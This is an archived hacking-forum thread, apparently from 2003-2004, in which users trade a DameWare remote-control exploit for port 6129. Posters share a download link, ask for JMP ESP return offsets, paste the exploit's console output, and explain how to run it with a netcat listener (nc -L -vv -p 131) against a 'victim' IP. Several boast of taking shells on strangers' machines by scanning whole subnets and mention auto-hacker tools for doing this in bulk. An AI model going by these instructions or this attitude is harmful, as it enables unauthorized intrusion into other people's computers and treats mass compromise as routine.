hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant

seppel18
http://www.security.nnov.ru/files/dmware.rar

worked for me...but only on NT4-SP6
seppel18
ahh...i have the prob...: those (filtered) JMP_ESP Offsets again.. sleep.gif
101

looks like another nasty work wirepair & adik hehe..
Also tested working.
seppel18
yeah..works wonderfull, with the right offsets biggrin.gif

Btw...need JMP-ESP from ws2_32.dll, from "win2k SP3 German" wink.gif

use findjmp, from here:

http://www.governmentsecurity.org/forum/in...e=post&id=29135
x1`
great it works just got a shell on a windows 2000 system smile.gif
X-FloppY
Can someone explain to me how to use this exploit?
isaiah
QUOTE (X-FloppY @ Dec 20 2003, 01:06 AM)
Can someone explain to me how to use this exploit?

if you dont know how to use a expliot you must be noob and how can we find out universal offsets
TeCH-NiNE
afaik... this one isnt a remote exploit... dont forget this ^^
x1`
it must be remote cause i got boxes with this little exploit just keep trying ips , smile.gif
JaANDniET
huhu
got 5 shells biggrin.gif
10x a lot mate !
X-FloppY
can someone explain to me why i can't get shell cuz i tryed like 500 ip's
i get this:
CODE

[*] Target IP:  xx.xxx.xx.xx   Port: 6129
[*] Local IP:   xx.x.x.x    Listening Port: 12

[*] Initializing sockets...                     [ OK ]
[*] Binding to local port: 12...                [ OK ]
[*] Setting up a listener...                    [ OK ]

OS Info   : WINNT4
SP String : Service Pack 6

EIP: 0x77f32836 (kernel32.dll)

[*] Constructing packet for WIN NT4 SP: 6...    [ OK ]
[*] Connecting to xx.xxx.xx.xx:6129...         [ OK ]
[*] Packet injected!
[*] Waiting for incoming connection...
[x] Exploit appears to have failed!


Axl
QUOTE (X-FloppY @ Dec 20 2003, 01:06 AM)
Can someone explain to me how to use this exploit? isaiah shutup, that was mean.

Scan for port 6129 and use the exploit biggrin.gif
Axl
QUOTE (TeCH-NiNE @ Dec 20 2003, 02:36 AM)
afaik... this one isnt a remote exploit... dont forget this ^^

er... yes it is.
Diablotic
QUOTE (QuantumTopology @ Dec 20 2003, 08:52 PM)
QUOTE (TeCH-NiNE @ Dec 20 2003, 02:36 AM)
afaik... this one isnt a remote exploit... dont forget this ^^

er... yes it is.

Er... it isnt smile.gif
I mean you need to have external (exteriar?) IP.
For instance i haven't so i cant use this exploit am i right?
Well maybe I can but only from another comp with remote desktop.Am I right?
Axl
QUOTE (Diablotic @ Dec 20 2003, 09:02 PM)
QUOTE (QuantumTopology @ Dec 20 2003, 08:52 PM)
QUOTE (TeCH-NiNE @ Dec 20 2003, 02:36 AM)
afaik... this one isnt a remote exploit... dont forget this ^^

er... yes it is.

Er... it isnt smile.gif
I mean you need to have external (exteriar?) IP.
For instance i haven't so i cant use this exploit am i right?
Well maybe I can but only from another comp with remote desktop.Am I right?

dude you aren't exploiting yourself.
Quasimod
Howto check if the listing port 6129 is version 3.72.0.0 ?
polax
good taff its merite reflexion wink.gif
XtrA
isn't that dwmrc.exe good than it?
eagle123
hi!
how i have to compile it?

if y try to compile with C in dos i get 10 errors.

Yellow_Blue
nice exploit BUt,
i have already Auto hax0r for it ;p
DrDoc
LOL nice replys yellow_blue in every Threat

rofl

Cya Doc
TheOther
Yellow Blue,

Could you share this auto-haxor with us?

Thx
sybexs
i still have yet to find an ip with this exploit. im just about to give up on it. and plus since its a rareity i doubt finding it will be easy.
Dalrok
nice try biggrin.gif
Train25
ive found quite a few shells but have noticed 2 configs it will not spawn a shell. Everyone I tried with these configs never spawn a shell.
They are:
WIN2000 [ver 5.0.2195] Service Pack 4
WINNT4 Service Pack 6

Did anyone manage to find good offsets for these 2 OSs. If so please post the offsets here.

Thanxs in advance
AsuKa
I know this is kind of old, but I have a prog. that filters out all of the bad/false ip's from your logs, if anyone wants I would be glad to send it to them, cant attach becuase Im still a trial member.
net_runner
...and i will try it, the replys are good recomendations
Steffan
QUOTE (Train25 @ Jan 22 2004, 02:56 AM)
WIN2000 [ver 5.0.2195] Service Pack 4
WINNT4 Service Pack 6

Did anyone manage to find good offsets for these 2 OSs. If so please post the offsets here.

W2K SP4 works allways.... with the moded exploit-....

I'll post the Offsets here when I get back home wink.gif

C'ya
Steven
n4than_69
QUOTE (Train25 @ Jan 22 2004, 02:56 AM)
ive found quite a few shells but have noticed 2 configs it will not spawn a shell. Everyone I tried with these configs never spawn a shell.
They are:
WIN2000 [ver 5.0.2195] Service Pack 4
WINNT4 Service Pack 6

Did anyone manage to find good offsets for these 2 OSs.  If so please post the offsets here.

Thanxs in advance

how about WinXP [ver 5.1.2600] ?
Steffan
QUOTE (n4than_69 @ Feb 4 2004, 04:14 PM)
how about WinXP [ver 5.1.2600] ?

Same it works and most U get a shell...

I'll upload my own coded exploit so U guyz can get a shell biggrin.gif

C'ya
Steven
Krogoth
okay, i've tried this tool and can't get a shell from WIN2000 [ver 5.0.2195] Service Pack 4. well, it works sometimes for WinXP [ver 5.1.2600]. so far not bad at all for the tool but there's little hope as most dameware has been patched up.

that's nice of you Steffan. your help is greatly appreciated.
AsuKa
Krogoth, I have gotten a shell from WIN2000 [ver 5.0.2195] Service Pack 4, maybe server is behind a firewall? Even though this is old, and servers are being patched up, I still get a multiple shells a day just scanning entire subnets. The filter really helps out with the checking since it elimates most of the duds. Although I dont support fxpboards and setting up stro's for warez, I like to look around, and the remove then remote control service when done biggrin.gif
Fooldj
i heard there were 2 versions of this..one by crylor and one by adik..and that one was buggy but the other was fine..anyone know anything about this?
Lusty
Nice exploid man... Thanks a lot.. nice that it isn't nessesary to use nc.exe to listend on the ports like if you use dameweird.
forza
it works well in the lab... but how can i see that the remote dameware is 3.72?
Knutinho
@ forza,

one thing u can do, is to check your ips, where port 6127 is open.
But i don't know any tool, which displays the versin of the dameware programm running on the other system.
mathofaka
biggrin.gif nice nice nice exploit i gat like ten shells biggrin.gif

for thoses who dont know how to use it ..
this is how i doit

i open to shells

i goto were the exploit is at
then i use netcat
nc -L -vv -p (any port) like 131 it has to be three numbers it should say netcat lising in port (wat ever u put)

in the other shell u go to were the exploit is at (again)
then i type in dameware (the ip of the victim the ure ip) then the port the u put 131

then wait
if it says patched
then 4 get that person
exposure
Hello everybody."

sorry for bad englisch

I'll have the problem when i'll starting nc.bat (netCad)
and i'll run the autohacker option 2 type scan.txt of whatver enter.
Than make a connection to the port 444
conecting good is on the screen done but cathering information i'll get a hangup from the autohacker tool
I'm not use a firewall.
So i'll get no shell's on the dos prompt never
Can anybody help me please what i can do to this problem.?
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.

 
Invision Power Board © 2001-2005 Invision Power Services, Inc.